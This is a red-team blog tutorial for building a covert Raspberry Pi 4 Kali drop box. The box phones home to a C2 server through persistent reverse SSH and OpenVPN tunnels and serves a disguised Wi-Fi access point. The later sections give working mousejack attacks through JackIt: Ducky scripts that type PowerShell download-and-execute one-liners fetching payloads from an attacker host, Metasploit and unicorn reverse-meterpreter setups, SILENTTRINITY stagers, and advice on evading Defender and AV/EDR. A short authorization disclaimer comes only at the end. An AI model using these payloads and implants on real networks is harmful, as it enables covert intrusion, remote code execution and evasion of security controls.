Learn how to setup and connect to your Raspberry Pi 4 drop box using reverse ssh tunnels, OpenVPN, and hostapd. Attack your client’s network, wireless APs, and peripherals using a full Kali instance with wireless attacks, mousejacking attacks, and more.
Not long ago, I was scheduled for an upcoming Red Team simulation for an energy company and I started going through all of my gear that I usually bring for the engagement. Aside from my usual tools like shims, lockpicks, and networking gear, I wanted to create a dropbox that I could place on the client’s network that would “phone home” to my attack server, then use tools directly from the dropbox on their network.
Normally, I would use tools such as a LAN Turtle, which is great, but I wanted something that had a full Kali Linux toolset already on it where I could remote in without having to forward traffic through it. I also wanted a device that would connect back to me using multiple methods in case the client’s firewall blocked certain ports outbound. Since Raspberry Pi recently came out with their Raspberry Pi 4, I decided to give it a try. With this type of dropbox, I could walk into a facility in disguise, place the dropbox on their network (preferably on a network switch), then leave the area and have access to their network through an OpenVPN connection and reverse SSH tunnel. I also wanted a backup method incase their egress firewall blocked my outbound traffic so I opted to include a wireless setup for the device. Lastly, I wanted another attack method against employees who used vulnerable wireless mice and keyboards.
DESIRED DEVICE REQUIREMENTS
Looking at various options for devices that could be used as dropboxes, I wanted something that was dependable, light, small, fast, and cheap. My desired requirements were the following:
- Device had to be relatively small in size where I could hide it behind a computer/under a desk, or by a network switch without being noticed.
- Have the capability to use a persistent reverse SSH tunnel and/or OpenVPN for command and control.
- Decent storage space (32GB-64GB or more)
- Fast enough hardware where I could use pentesting tools and not have horrible lag/sluggishness.
- Cost cheap enough where if it got destroyed or taken by someone, it wouldn’t kill my budget.
- Option to later add modules for wireless connection and attacks or even a cellular interface for connecting to it via a backchannel.
The list of specifications for the Raspberry Pi 4 can be seen below:
- Broadcom BCM2711, Quad core Cortex-A72 (ARM v8) 64-bit SoC @ 1.5GHz
- 1GB, 2GB or 4GB LPDDR4-2400 SDRAM (depending on model)
- 2.4 GHz and 5.0 GHz IEEE 802.11ac wireless, Bluetooth 5.0, BLE
- Gigabit Ethernet
- 2 USB 3.0 ports; 2 USB 2.0 ports.
- Raspberry Pi standard 40 pin GPIO header (fully backwards compatible with previous boards)
- 2 × micro-HDMI ports (up to 4kp60 supported)
- 2-lane MIPI DSI display port
- 2-lane MIPI CSI camera port
- 4-pole stereo audio and composite video port
- H.265 (4kp60 decode), H264 (1080p60 decode, 1080p30 encode)
- OpenGL ES 3.0 graphics
- Micro-SD card slot for loading operating system and data storage
- 5V DC via USB-C connector (minimum 3A*)
- 5V DC via GPIO header (minimum 3A*)
- Power over Ethernet (PoE) enabled (requires separate PoE HAT)
- Operating temperature: 0 – 50 degrees C ambient
* A good quality 2.5A power supply can be used if downstream USB peripherals consume less than 500mA in total.
For the device, I purchased it from CanaKit and I decided to buy the 4GB Basic Kit which was right at $70. The board by itself would only be $55 but I wanted to get the power adapter, heat sinks, etc.
HARDWARE SHOPPING LIST
Raspberry Pi 4 Case with Fan – $12 (optional)
Wireless WiFi USB Dongle Stick Adapter RT5370 150Mbps – $9 (optional)
Crazyradio PA – $35 (optional)
[Note, you could get the Raspberry Pi 4 Model B with 4GB RAM by itself without extras for $55 if you wanted to go cheaper.]
For the operating system, I opted to go with Kali Linux as it already has a lot of great tools on it and is geared for pentesting. You can definitely put something like Debian/Ubuntu on the device and add your own tools if you are worried about specific traffic getting noticed by a blue team member that corresponds with Kali Linux. For my needs and ease of use of this demo, I went ahead and installed Kali. Along with the desktop Kali images, Offsec also provides images for ARM devices which the Raspberry Pi 4 device falls under. Each of those Kali images can be found here.
To have the Kali ARM image written to the microSD card, you would use a tool like Win32DiskImager along with 7zip to unzip the .img.xz file. Detailed explanations on the setup with be found below under the “Setup” section.
The Raspberry Pi 4 already has a built-in wireless card (2.4 GHz and 5.0 GHz IEEE 802.11ac wireless) with it, and does support packet injection and monitor mode (the Pi 3 didn’t). So you would have the ability to use either the built-in wireless (wlan0) or get another wireless adapter that might have better range if you want to do wireless attacks.
I purchased a wireless adapter that has a RT5370 chipset which also supports monitor mode. This worked perfectly for injecting packets with tools like Aireplay-ng and had decent range. I could connect to one adapter via hostapd and use the other adapter for attacks.
With the wireless adapter and onboard wireless, I could setup Hostapd to create an access point (walkthrough to setup that up explained later) that would allow me to connect without physically being connected to it. The wireless adapter is optional to have for wireless attacks if you want to go that route as the built-in wireless adapter is really all you need if you just want to connect to the Raspberry Pi 4 over wireless or connect back via OpenVPN/SSH and perform wireless attacks using the built-in wireless.
CRAZY PA WIRELESS ATTACKS
The Crazy PA is a USB radio dongle based on the nRF24LU1+ from Nordic Semiconductor which operates on a 2.4GHz ISM band radio. This little dongle can be a great attack method against users who use a vulnerable wireless keyboard or mouse by using an attack called “mousejack”. From the mousejack.com website, it states:
MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. These peripherals are ‘connected’ to a host computer using a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim’s computer by transmitting specially-crafted radio signals using a device which costs as little as $15.
An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer, without physically being in front of it, and type arbitrary text or send scripted commands. It is therefore possible to perform rapidly malicious activities without being detected.
The MouseJack exploit centers around injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, and keystrokes are often encrypted (to prevent eavesdropping what is being typed). However the MouseJack vulnerability takes advantage of affected receiver dongles, and their associated software, allowing unencrypted keystrokes transmitted by an attacker to be passed on to the computer’s operating system as if the victim had legitimately typed them.
Since our Raspberry Pi device will be planted under a desk or near other users and since we are using a full Kali install, why not have a device that could potentially compromise wireless keyboards and mice?
With the Raspberry Pi 4 basic kit, you already get a few heat sinks that perfectly fits the Raspberry Pi 4 chips but I heard about the Raspberry Pi 4 getting a little hot so I wanted a case with a fan to be safe. The case I found and used was Virlos’ clear transparent case with built-in fan. If you want to go with an all black case you could just spray the case with black spraypaint if the clear case is not for you or get the Raspberry Pi 4 starter package that comes with a black case, then get a shim fan that you can place inside that.
Additionally, you could go with a basic board and shim fan, then hide the Raspberry Pi 4 in a case that looks somewhat inconspicuous such as a power strip.
In the end, it is up to you with how you want to hide your device after getting into a facility. Personally, I like the idea of a case with fan for protection and cooling. I also plan to stick the device under desks or by switches so I use small velcro tabs on one side of the Raspberry Pi 4 case where I can stick it anywhere then take it off easily when I’m done. This allows me to walk into an area and within a few seconds setup the device.
Now that we have the hardware in hand, let’s go over how we get this all running. We’ll go over the following:
- Initial Setup of the Kali Image for your MicroSD Card
- Setup a WiFi Access Point Using Hostapd
- Setup of Automatic Reverse SSH Tunnel
- Setup of OpenVPN Client and Server
- Setup of Crazy PA for Mousejack Attacks
- Installation of Additional Tools
INITIAL SETUP OF THE KALI IMAGE FOR YOUR MICROSD CARD
- Download the Kali Raspberry Pi 4 image from the Kali downloads site here.
- Flash the Kali image to the microSD card that you will use for your Raspberry Pi 4.
- For Windows
- Use a microSD to USB adapter and connect the microSD card to your Windows system.
- On a Windows system, unzip the kali-linux-*-rpi3-nexmon.img.xz file with 7zip or WinRAR.
- Use Etcher to write the Kali image to the microSD card.
- For Linux
- Use a MicroSD to USB adapter and connect the microSD card to the Linux system.
- Use the “dd” tool to image the Kali file to the microSD card. (Note* – make sure to choose the correct storage device here or you risk accidently deleting your computers hard disk. In my example, the device was found under /dev/sdb but yours may be different)
- Example command:
zxcat kali-linux-2020.4-rpi4-nexmon-img.xz | dd of=/dev/sdb bs=512k
- Insert the microSD card into the Raspberry Pi 4 and boot it up using the power supply, an HDMI cable for display, and keyboard/mouse plugged into the USB ports.
- Login to the Kali Linux distro with the username of “kali” and the password of “kali”.
- Plug an Ethernet cable into the Raspberry Pi 4 to provide Internet to the device. The Raspberry Pi 4 should automatically attempt to obtain an IP address via DHCP.
- Change the root and “kali” user password. This can be accomplished by opening up a terminal and typing “sudo -s” (then enter “kali” password), then typing “passwd”, then hitting “enter”. Follow the dialog to change the root password:
sudo -s (enter "kali" for password) passwd root (change password) passwd kali (change password)
- Update and upgrade the Kali distribution:
apt-get update && apt-get upgrade
- Change the hostname of your device:
nano /etc/hostname [change “kali” to anything you want]nano /etc/hosts [change “kali” to anything you want]
- Then reboot:
- For Windows
SETUP A WIFI ACCESS POINT USING HOSTAPD AND DNSMASQ
For our pentesting box, we can use one or two wifi interfaces (depending if you have the optional wifi antenna). We will covering setting up wlan0 using hostapd so we can connect to the access point when we are in range of the dropbox and we will use the other wifi interface (e.g. wlan1) to perform the wireless attacks. This is convenient when other callback tools aren’t calling back due to firewalls, etc.
The first thing we have to do is set the static IP address of the wlan0 interface:
- To do it edit the file /etc/network/interfaces:
- We will add the below code to the end of the file:
auto wlan0iface wlan0 inet staticaddress 192.168.200.1/24gateway 192.168.200.1
- As you can see I’ve set the subnet to 192.168.200.0, because I don’t want to have and collision with the victim’s network. The probability that someone has also set that network is low. Secondly we need to configure interface wlan0 as Access Point. We need to install and configure hostapd:
apt-get install hostapd
- When the package is downloaded, create the file /etc/hostapd/hostapd.conf and paste the below text. If you know the channel of the victim’s network, change the channel in the file to different, which is further to avoid the same frequency band. For example if the attacked network uses the 3’rd channel, set it to 11’th. Set SSID and wpa_passphrase as you want. SSID is the name of the network which you will connect from mobile phone and wpa_passphrase is the password to this network. I’ve set the name to AndroidAP to make it unsuspected (looks like default network name when using a phone as a Wi-Fi router):
rfkill unblock wlannano /etc/hostapd/hostapd.conf# Wifi interface and driver to be usedinterface=wlan0driver=nl80211# WiFi settingshw_mode=gchannel=6ieee80211n=1wmm_enabled=1ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]macaddr_acl=0ignore_broadcast_ssid=0# Use WPA authentication and a pre-shared keyauth_algs=1wpa=2wpa_key_mgmt=WPA-PSKrsn_pairwise=CCMP# Network Namessid=AndroidAP# Network passwordwpa_passphrase=strong_pass
- Set default config of hostapd by editing the file /etc/default/hostapd and set the DAEMON_CONF variable:
- Enable hostapd service to start it automatically when Raspberry is turning on (I had to unmask hostapd):
systemctl unmask hostapdsystemctl enable hostapdsystemctl start hostapd
- You’ll need to install a couple of convenience packages that allow you to retain your firewall configuration rules across reboots. To do this, run the following in an open terminal or SSH window:
apt-get install netfilter-persistent iptables-persistent
- We’ll now enable IP forwarding to make our dropbox function as a router an connect different networks together. This instructs the Pi to forward all data packets in all directions, according to the routing and firewall settings. Edit the file /etc/sysctl.conf and uncomment the below line:
- Apply the change:
sysctl -p /etc/sysctl.conf
- Once this is set up, you’ll need to configure your firewall rules. This involves allowing the wireless interface to forward data back and forth, and the masquerading itself. To do this, type the following in an open terminal window or over SSH:
iptables -A FORWARD -i wlan0 -j ACCEPT
iptables -A FORWARD -o wlan0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
- You’re now safe to save your rules. Before you do, however, you should check that the firewall rules have been added correctly by typing the following in a terminal or SSH window:
iptables -t nat -L
- If you’re ready to save, type the following in a terminal/SSH window:
iptables-save > /etc/iptables/rules.v4
- [IMPORTANT EDIT] After reboot, I found that the rules weren’t being saved. I tried creating a cron job with no luck so I created a custom systemd service to ensure routing is enabled on boot. Let’s go through the steps. First we need to create a basic bash script:
- We will put the following within:
iptables -A FORWARD -i wlan0 -j ACCEPT
iptables -A FORWARD -o wlan0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
- The above “sleep 15” ensures enough time has passed after reboot to run the script. Save the script (ctrl+X -> Y -> ENTER), then make it executable:
chmod +x /usr/bin/routing.sh
- Now we will create a Unit file to define a systemd service:
- We will place the following within:
- This defines a simple service. The critical part is the ExecStart directive, which specifies the command that will be run to start the service. We’ll now give the /etc/systemd/system/myservice.service permissions:
chmod +x /etc/systemd/system/myservice.service
- Once you have a unit file, you are ready to test the service:
systemctl start myservice
- Check the status of the service:
systemctl status myservice
- Finally, use the enable command to ensure that the service starts whenever the system boots:
systemctl enable myservice
- Now we’ll reboot:
- Check with the following commands that MASQUERADE is present in the “Chain POSTROUTING” section and “ACCEPT all — anywhere” is present in the “Chain FORWARD” section:iptables -t nat -L (should see “MASQUERADE” in the “Chain POSTROUTING” section)iptables -L (should see two “ACCEPT all — anywhere” in the “Chain FORWARD” section)
- Now when you connect your device to the hostapd wifi access point, you should have Internet.
SETUP DHCP SERVER
To make life easier and avoid setting a static IP address on the device you are connecting from to the Raspberry Pi when connecting with the network, we have to set up the DHCP server.
- First we will install dnsmasq then move the default config file as it is 700+ lines and we don’t need it.
apt-get install dnsmasq
mv /etc/dnsmasq.conf /etc/dnsmasq.conf.orig
- Create the file /etc/dnsmasq.conf and paste the below text:
# DHCP server active for WLAN interface
interface = wlan0
# DHCP server not active for existing network
no-dhcp-interface = eth0
# IPv4 address range and lease time
dhcp-range = 192.168.200.100,192.168.200.150,24h
- The first parameter is the first IP address (usually ending in .2, as .1 is the Pi itself), the second is the last IP address. The third parameter is the network mask, which varies by network size. The last parameter is the DHCP lease’s duration, and 24 hours is perfectly fine in pretty much all cases.
- Before commissioning, it is recommended to test the configuration:dnsmasq –test -C /etc/dnsmasq.conf
- The syntax check should succeed with an “OK”.
- Now we’ll enable the dnsmasq service:
systemctl restart dnsmasq
systemctl enable dnsmasq
- Reboot the dropbox:
SETUP AUTOMATIC REVERSE SSH TUNNEL
This section assumes you have a command and control server accessible on the Internet and that server has SSH enabled on port 22. For my C2 server, I use Amazon’s Lightsail but you can any cloud service or even a server at your house with port forwarding enabled.
- Install “autossh” to use to automatically create an SSH tunnel to a command and control server:
apt-get install autossh
- Generate SSH keys:
ssh-keygen [Leave all of the settings default]
- Copy /root/.ssh/id_rsa.pub to the C2 server:
scp /root/.ssh/id_rsa.pub root@<C2 IP Address>:/directory/to/upload/to/
- Append the contents of id_rsa.pub to ~/.ssh/authorized_keys or create this file on the C2 server:[On the C2 server]
cat /directory/to/upload/to/id_rsa.pub >> ~/.ssh/authorized_keys
- Test the key-based authentication. If all goes you should end up logged into the C2 server without the requirement of entering a password.[On the RASPBERRY Pi 4]
ssh root@<C2 IP address>
- Test “autossh”:
autossh -M 11166 -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<C2 IP Address>
- If you login to your VPS/C2 server, you should now see port 6667 present after you run a “netstat -antp” command.
- To have the autossh start at boot, we will create a cronjob that points to a script. First we will create a bash script for our autossh file:
- Then we place the autossh command inside the autossh-connect.sh file:
autossh -M 11166 -N -f -o “PubkeyAuthentication=yes” -o “PasswordAuthentication=no” -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<Your C2 Server IP> &
- Flag meanings:
- -N: Do not execute a command on the middleman machine
- -f: Drop in the background
- &: Execute this command but do not wait for output or an exit code. If this is not added, your machine might hang at boot
- For the cronjob creation, type the following command:
- At the bottom of the script (no “#” should be in front of what you are typing), add the following:
@reboot sleep 5 && /bin/autossh-connect.sh > /dev/null 2>&1
*/5 * * * * /bin/autossh-connect.sh > /dev/null 2>&1This tells the cron job after reboot to wait 5 seconds and run the autossh-connect.sh script which will start the autossh process. The 5 seconds was added to ensure the network manager has started first. The “> /dev/null 2>&1” part ensures that no logs are written out to any files as to not take up space. On the second line, the cron job will also try and run every 5 minutes. This is due in case the autossh job gets disconnected or fails for whatever reason.
- That’s it. Now when your Raspberry Pi 4 starts, it should autossh to your C2 server which will create a local port of 6667 on the C2 server. When you SSH from your attacker system onto the C2 server, you can run the following command on your C2 server to get access to your Raspberry Pi 4 device:
ssh localhost -p 6667 [This is ran on the C2 server]
SETUP OF OPENVPN CLIENT AND SERVER
While we can do a reverse SSH shell to access our Raspberry Pi 4 device, we will also configure the device to use a reverse OpenVPN connection over port 443 (HTTPS). Since the Raspberry Pi 4 will be dropped on the back of a system (or switch) inside an organization, we won’t be able to directly connect to it. Therefore, we will have the Raspberry Pi 4 first go outbound via port 443 for VPN back to our OpenVPN AS server. From our attacker Kali box, we will have to also log into the VPN server. Once the Raspberry Pi 4 and attacker machine are VPN’d into our OpenVPN C2 server, we can remote into the Raspberry Pi 4 to scan or exploit systems. This ensures that if the client blocks port 22 outbound for SSH, we have another option to connect over port 443 (HTTPS).
There are three items we need to configure for this setup:
- OpenVPN AS server on the Internet.
- Raspberry Pi 4 device.
- Attacker system.
Setting Up a VPS OpenVPN AS Server
We want to make sure that our VPN server is externally-facing. We will want to host our VPN server on a VPS server as they are extremely easy and quick to setup.
Two providers I like to use are Vultr.com and Amazon Lightsail. This is because these VPS providers are quick, cheap, and super easy to setup. The other reason to pick certain VPS providers is detection of traffic. Most of the time, the victim’s network will have a lot of traffic to AWS servers. This would allow you to hide in their traffic.
- Go to https://aws.amazon.com/lightsail/ and create a new VPS
- Once created, go to Manage -> Networking
- Add two Firewall TCP Ports (443 and 943)
- Install an OS like Ubuntu. Then make sure to chmod 600 your SSH keys and login to your VPS server from your attacker system:
ssh -i LightsailDefaultPrivateKey-us-west-2.pem ubuntu@[IP]
- After SSHing into the server, go to root:
sudo su -
- Update the server:
apt-get update && apt-get upgrade
- Install OpenVPN AS. Go here to find the latest version:
- Copy the link and download it onto the VPS. Example:
- Install OpenVPN AS
dpkg -i openvpn-as-latest-ubuntu18.amd_64.deb
- Delete the current profile and configure OpenVPN:
- Type DELETE: (case sensitive)
- During the setup, a wizard will appear:
Accept EULA: yesWill this be the primary Access Server node: yesPlease specify the network interface and IP address to beused by the Admin Web UI:(1) all interfaces: 0.0.0.0(2) eth0: 18.104.22.168Answer: 1Please specify the port number for the Admin Web UI.Answer: 943Should client traffic be routed by default through the VPN?Answer: YESShould client DNS traffic be routed by default through the VPN?Answer: YESUse local authentication via internal DB?> Press ENTER for default [no]: Answer: YESThe rest of these answers should be default. Simply hit the <Enter> key
- Change OpenVPN Admin password:
passwd openvpn supersecretpassword123 [Set your own unique password here][Note – This is a great time to put IPTables for port 943 to only allow connections from your networks.]
Configure OpenVPN AS Server
- Go to https://[IP Address of VPS server]:943/admin/
- Login with user account “openvpn” and the password you just createdNote: If you are using AWS Lightsail, go to server network settings and make sure the hostname or IP Address is the right PUBLIC IP address and not the PRIVATE one, then save and update.
- In the OpenVPN, verify authentication is set to local:
Authentication -> General -> Set to Local (On) -> Save Settings -> Update Server
- Create Two Users with Allow Auto-Login enabled (I did rasp4 and redteam).Go to User Management -> User PermissionsFor each user:
[Make sure to Set Passwords for both of them]
- For the “rasp4” and “redteam” accounts to allow connectivity via VPN, we need to enable some permissions. Make sure to configure / enable user User Permissions:
All server-side private subnets
All other VPN clients
Download OpenVPN Profiles
- Connect to download profiles
- For each user (rasp4 and redteam) login and download the profile – Yourself (autologin profile)
- Save as rasp4.ovpn and redteam.ovpn accordingly
Setting Up the Raspberry Pi 4 and Initial Configuration
- Turn on the Raspberry Pi 4 and plug in your ethernet cable
- Login to the Raspberry Pi 4 and install OpenVPN:
apt-get install openvpn
- Configure OpenVPN to autostart the .conf files:
nano /etc/default/openvpn[Remove the “#” in front of ‘AUTOSTART=”all”’ then exit and save]
- Copy your rasp4.ovpn file to the Raspberry Pi 4:
scp rasp4.ovpn <Raspberry Pi 4 IP>:/etc/openvpn
- From the Raspberry Pi 4, go to the /etc/openvpn directory and change the file name from rasp4.ovpn to client.conf:
mv rasp4.ovpn client.conf[Note – The client.conf file should directly be in the /etc/openvpn/ directory and not in any subdirectory such as “client/” or “server/”]
- Enable OpenVPN to start on boot:
update-rc.d openvpn enable
- Verify OpenVPN starts by rebooting:
This should start the OpenVPN client on our Raspberry Pi 4 device. To make sure it works, go back into your OpenVPN AS server and check for connections. Go to “Current Users” under the Status menu and you should see the “Common Name” as “rasp4” with the real address as the external WAN address of where the Raspberry Pi 4 is plugged in and a VPN address.
We now have the Raspberry Pi 4 configured so that any time it connects to a network, it connects back to our VPN Server and we can SSH into the Raspberry Pi 4. For good measure, I would recommend you unplug the Raspberry Pi 4 and plug it back in to test that the OpenVPN auto-connects back to your OpenVPN server.
Accessing the Raspberry Pi 4 from your Attacker System
To access your Raspberry Pi 4 from your attacking system, you would use openvpn from your attacker system with the redteam.ovpn profile you created earlier on the OpenVPN server. From your attacking system, use the following command:
openvpn --config ./redteam.ovpn
(note – the Raspberry Pi 4 is calling back with the “rasp4.ovpn” user and you will create a connection using the redteam.ovpn user from your attacker box (e.g. Kali attack box on your laptop or desktop))
To SSH into our Raspberry Pi 4 device, we go to the OpenVPN page at the following address:
- https://[OpenVPN IP]:943/admin/current_users
Go to the “Current Users” section under “Status” and view/copy the “VPN Address” for the “rasp4” user. You would use this address to SSH into the Raspberry Pi 4 device (e.g. ssh 172.27.224.6) from your attacker Kali box (the one where you ran the openvpn —config ./redteam.ovpn from).
That’s it. Now we can plant the Raspberry Pi 4 on the network and it will auto-VPN back to our OpenVPN server.
SETUP OF CRAZYRADIO PA FOR MOUSEJACK ATTACKS
Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found below:
- Plugin your Crazyradio PA to the Raspberry Pi 4.
- Run the following commands:
apt-get install sdcc binutils python python-pip
cd /opt && git clone https://github.com/BastilleResearch/mousejack.git
pip install -U pip
pip install -U -I pyusb
pip install -U platformio
git submodule init
git submodule update
- Afterwards, your Crazyradio PA device should not be flashed. Next run the following:
cd /opt/ && git clone https://github.com/insecurityofthings/jackit.git
pip install -e .
- Once your CrazyRadio PA is ready, you can launch JackIt via:
- Without a ducky-style script, the jackit tool will simply scan the area for vulnerable wireless keyboards and mice.
- You can find more information on Ducky scripts here.
- For this demo, we will go over several types of attacks. One will use Metasploit’s web_delivery module (exploit/multi/script/web_delivery) to deliver and receive shells, another will use unicorn payloads and the last one (one of my favorites) will use SILENTTRINITY for the attack.
Metasploit “web_delivery” Module
Before we begin, let’s create the metasploit database and user for the metasploit database.
- We’ll save some time by logging directly into our Raspberry Pi 4 device (using your keyboard, mouse, and monitor plugged into the Raspberry Pi 4).
- Now go to “Applications” on the top left corner
- Then go to “08 – Exploitation Tools” and click on “metasploit framework”. This will create the database for you and create the database user. (You can also run the command “msfdb init”)
- In a terminal on the Raspberry Pi 4, type the following:
msfconsoleuse multi/script/web_deliveryset TARGET 2 [This sets the target to PowerShell (PSH)]set payload windows/meterpreter/reverse_httpsset LHOST [put your ethernet IP address here]set LPORT 443set SRVHOST [put your ethernet IP address here]set SRVPORT 80
- Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:
- Here is an example of the output:powershell.exe -nop -w hidden -c $y=new-object net.webclient;$y.proxy=[Net.WebRequest]::GetSystemWebProxy();$y.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $y.downloadstring(‘http://192.168.0.5/qjVoGRS1de3o6’);
- Now that we’ve set up our metasploit instance and we have our malicious string in place, we can create a Ducky script. Make sure to save it locally (e.g. ducky-script.txt):
GUI rDELAY 300STRING powershell.exe -nop -w hidden -c $y=new-object net.webclient;$y.proxy=[Net.WebRequest]::GetSystemWebProxy();$y.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $y.downloadstring('http://192.168.0.5/qjVoGRS1de3o6');DELAY 300ENTERENTER
- It should be noted that the payload could be cut down to make it shorter. With the JackIt attack, shorter payloads work better. Just know that with shorter less obfuscated payloads, you have more chances of getting hit by host and user-based detections. A shorter payload might look like the following:
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.0.7/a');[Note – you can also use Cobalt Strike and Empire PowerShell one-liners too]
- To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the –script flag:jackit –script ducky-script.txt
- Now simply pick the target you want to attack and you should get a shell back.
This attack is very close to the last one but we will use TrustedSec’s unicorn tool to generate the payload.
- Let’s download the unicorn tool:
cd /opt/ && git clone https://github.com/trustedsec/unicorn.git
- Next, we will run unicorn.py to view the various attack options
- In this scenario, we will chose the PowerShell (PS) attack listed first:
python unicorn.py windows/meterpreter/reverse_https 192.168.0.5 443
- This will take a moment to generate the shellcode…
- This will generate two files. A “powershell_attack.txt” file and a “unicorn.rc” file for Metasploit.
- First, let’s move the “powershell_attack.txt” file to the /var/www/html/ directory
mv powershell_attack.txt /var/www/html/hi.txt
- Now we will start Apache2 with the following command:
service apache2 start
- Now we will start Metasploit using the unicorn.rc resource file:
msfconsole -r unicorn.rc
- Notice that with the unicorn.rc resource file, all the options and module needed are loaded.
- Now we’ll setup a ducky script for the payload:
nano unicorn_ps.txtGUI rDELAY 300STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring(‘http://192.168.0.5/hi.txt’);ENTER
- Start Jackitjackit —script unicorn_ps.txt
- That’s it. Now we attack a vulnerable device and wait for a reverse shell.
SILENTTRINITY Attack Method
SILENTTRINITY is modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. To view more info about this tool, go here.
Let’s start with installing dependencies:
git clone https://github.com/SecureAuthCorp/impacket.git
pip install -r requirements.txt
pip install .
- If you run into issues with the wrong version of ldap3 try the following:
pip2 install ldap3==2.5.1
pip2 uninstall ldap3==2.5.2
python setup.py install [You should be good now]
- If you run into issues with the wrong version of ldap3 try the following:
apt-get install python3.7 python3.7-dev python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
Clone the repo and use pipenv to install the dependencies for the Client & Teamserver:
pip3 install pipenv && pipenv install && pipenv shell
Now run teamserver.py with the following options:
python3 teamserver.py <Your local IP Address> ‘<A random password>’
Open another terminal, go back to /opt/SILENTTRINITY/ and run the following commands:
connect wss://username:<Your random password>@<Your local IP address>:5000
It should say that it “Generated stager to ./stager.ps1. This “stager.ps1” file will be in /opt/SILENTTRINITY/stager.ps1. Move this file to /var/www/html/ and start apache2:
mv /opt/SILENTTRINITY/stager.ps1 /var/www/html/
service apache2 start
Now you can run the Jackit tool and use this payload against a vulnerable wireless device. This payload when tried recently has bypassed antivirus to include next-gen AV when I ran it in memory and when I used HTTPS instead of HTTP for the download.
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring(‘https://<Your IP>/stager.ps1’);
After you get your session, the SILENTTRINITY tool has a lot of modules for POST exploitation like mimikatz, enumeration scripts, cmd, winrm, exfil via github, etc.
Also with this tool, I was able to bypass Defender. I’d like to note that downloading stager.ps1 through the browser caused Defender to block the download but was able to bypass Defender by downloading and running the stager in memory. I was able to bypass 3 AV/EDR vendors using this technique; although, at least one EDR system, detected suspicious powershell usage (i.e., powershell downloaded something and ran it). Therefore, if you are able to deliver the stager another way such as say, over smb, you may be able to bypass at least a few AV/EDR. I didn’t cover the msbuild stager during this post, but if you really wanted to bypass AV/EDR, try this type of stager. As long as msbuild.exe is installed on the attack system, you should be good to go (at least for now).
ADDITIONAL TOOLS FOR THE DROPBOX
Some tools are installed on the dropbox by default such as sqlmap, nmap, wireshark, hydra, john, aircrack-ng and some others but make sure you install whatever tools you like. For example you might add the following:
apt-get install responder macchanger voiphopper snmpcheck onesixtyone patator isr-evilgrade creddump screen crackmapexec
git clone https://github.com/FortyNorthSecurity/EyeWitness.git
git clone https://github.com/SecureAuthCorp/impacket.git
etc etc etc
The Raspberry Pi 4 dropbox worked perfectly for my red team engagement where I ended up placing the device behind a printer closest to the customer’s parking lot (easier to reach wireless just in case). The device connected back over both OpenVPN (port 443) and SSH using autossh (port 22) and both connections were solid. I was able to handle multiple meterpreter shells with ease and I found that the device and commands ran on it were surprisingly fast. I also found that I was able to exploit several wireless keyboards and a wireless mouse with the Jackit tool. I also found that the device was just as good as me having a laptop on their network running the same tools. The only thing I didn’t try was password hash cracking on the device as I have my own offline system dedicated for that but I think it would handle some light cracking.
With any red teaming / pentesting or running tools mentioned above, it is imperative that you ALWAYS have permission beforehand. The information provided is meant solely for educational purposes and for legal/authorized use.
Author: Jason Zaffuto